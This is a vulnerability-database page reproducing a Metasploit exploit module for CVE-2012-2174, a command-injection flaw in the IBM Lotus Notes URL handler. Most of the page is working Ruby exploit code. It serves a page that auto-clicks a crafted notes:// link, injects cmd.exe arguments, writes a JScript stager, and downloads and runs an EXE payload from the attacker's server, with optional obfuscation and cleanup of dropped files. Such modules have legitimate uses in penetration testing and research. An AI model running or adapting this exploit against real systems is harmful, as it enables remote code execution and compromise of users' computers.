Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IBM Lotus Notes Client URL Handler - Command Injection (Metasploit)

🗓️ 25 Dec 2012 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

IBM Lotus Notes Client URL Handler Command Injectio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		IBM Lotus Notes Client URL Handler Command Injection Vulnerability
25 Dec 201200:00
zdt
Circl		CVE-2012-2174
25 Dec 201200:00
circl
Check Point Advisories		IBM Lotus Notes URL Handler Command Execution (CVE-2012-2174)
14 Oct 201200:00
checkpoint_advisories
CVE		CVE-2012-2174
20 Jun 201210:00
cve
Cvelist		CVE-2012-2174
20 Jun 201210:00
cvelist
d2		DSquare Exploit Pack: D2SEC_NOTESURL
20 Jun 201210:27
d2
Tenable Nessus		IBM Lotus Notes < 8.5.3 FP2 URL Handler Unspecified Remote Code Execution
10 Aug 201200:00
nessus
Metasploit		IBM Lotus Notes Client URL Handler Command Injection
24 Dec 201215:23
metasploit
NVD		CVE-2012-2174
20 Jun 201210:27
nvd
OpenVAS		IBM Lotus Notes URL Command Injection RCE Vulnerability - Windows
23 Jan 201300:00
openvas
Rows per page
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE
	include Msf::Exploit::FileDropper

	def initialize(info={})
		super(update_info(info,
			'Name'           => "IBM Lotus Notes Client URL Handler Command Injection",
			'Description'    => %q{
					This modules exploits a command injection vulnerability in the URL handler for
				for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
				an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
				arguments. This module has been tested successfully on Windows XP SP3 with IE8,
				Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Moritz Jodeit', # Vulnerability discovery
					'Sean de Regge', # Vulnerability analysis
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2012-2174' ],
					[ 'OSVDB', '83063' ],
					[ 'BID', '54070' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
					[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
					[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
				],
			'Payload'        =>
				{
					'Space'           => 2048,
					'StackAdjustment' => -3500
				},
			'DefaultOptions'  =>
				{
					'EXITFUNC'         => "none",
					'InitialAutoRunScript' => 'migrate -k -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jun 18 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)
	end

	def exploit
		@exe_name = rand_text_alpha(2) + ".exe"
		@stage_name = rand_text_alpha(2) + ".js"
		super
	end

	def on_new_session(session)
		if session.type == "meterpreter"
			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
		end

		@dropped_files.delete_if do |file|
			win_file = file.gsub("/", "\\\\")
			if session.type == "meterpreter"
				begin
					wintemp = session.fs.file.expand_path("%TEMP%")
					win_file = "#{wintemp}\\#{win_file}"
					# Meterpreter should do this automatically as part of
					# fs.file.rm().  Until that has been implemented, remove the
					# read-only flag with a command.
					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
					session.fs.file.rm(win_file)
					print_good("Deleted #{file}")
					true
				rescue ::Rex::Post::Meterpreter::RequestError
					print_error("Failed to delete #{win_file}")
					false
				end

			end
		end

	end

	def on_request_uri(cli, request)

		if request.uri =~ /\.exe$/
			return if ((p=regenerate_payload(cli))==nil)
			register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
			register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
			data = generate_payload_exe({:code=>p.encoded})
			print_status("Sending payload")
			send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
			return
		end

		my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
		if datastore['SSL']
			schema = "https"
		else
			schema = "http"
		end
		uri = "#{schema}://#{my_host}"
		uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"

		script = "var w=new ActiveXObject('wscript.shell');"
		script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
		script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
		script << "x.open('GET','#{uri}', false);"
		script << "x.send();"
		script << "var s=new ActiveXObject('ADODB.Stream');"
		script << "s.Mode=3;"
		script << "s.Type=1;"
		script << "s.Open();"
		script << "s.Write(x.responseBody);"
		script << "s.SaveToFile('#{@exe_name}',2);"
		script << "w.Run('#{@exe_name}');"

		vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"

		link_id = rand_text_alpha(5 + rand(5))

		js_click_link = %Q|
		function clickLink(link) {
			var cancelled = false;

			if (document.createEvent) {
				var event = document.createEvent("MouseEvents");
				event.initMouseEvent("click", true, true, window,
					0, 0, 0, 0, 0,
					false, false, false, false,
					0, null);
				cancelled = !link.dispatchEvent(event);
			}
			else if (link.fireEvent) {
				cancelled = !link.fireEvent("onclick");
			}

			if (!cancelled) {
				window.location = link.href;
			}
		}
		|

		if datastore['OBFUSCATE']
			js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
			js_click_link.obfuscate
			js_click_link_fn = js_click_link.sym('clickLink')
		else
			js_click_link_fn = 'clickLink'
		end


		html = <<-EOS
		<html>
		<head>
		<script>
		#{js_click_link}
		</script>
		</head>
		<body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
		<a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
		</body>
		</html>
		EOS

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Dec 2012 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.64625
ibm lotus notescommand injectionmetasploitvulnerabilitywindows xpgoogle chromeinternet explorerexploitcve-2012-2174osvdb-83063bid-54070url handlerpayloadsslhtml.
33